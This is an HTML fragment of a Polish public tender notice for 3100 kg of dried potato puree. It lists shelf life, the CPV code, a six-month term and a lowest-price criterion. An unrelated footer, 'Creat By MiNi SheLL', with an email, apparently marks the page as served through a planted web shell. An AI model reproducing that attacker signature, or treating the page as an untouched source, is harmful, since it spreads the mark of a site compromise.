<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Puree ziemniaczane, w płatkach ziemniaczanych lub w proszku. Minimalny przyrost produktu w stosunku do masy puree 6-krotny, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość  3100kg ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com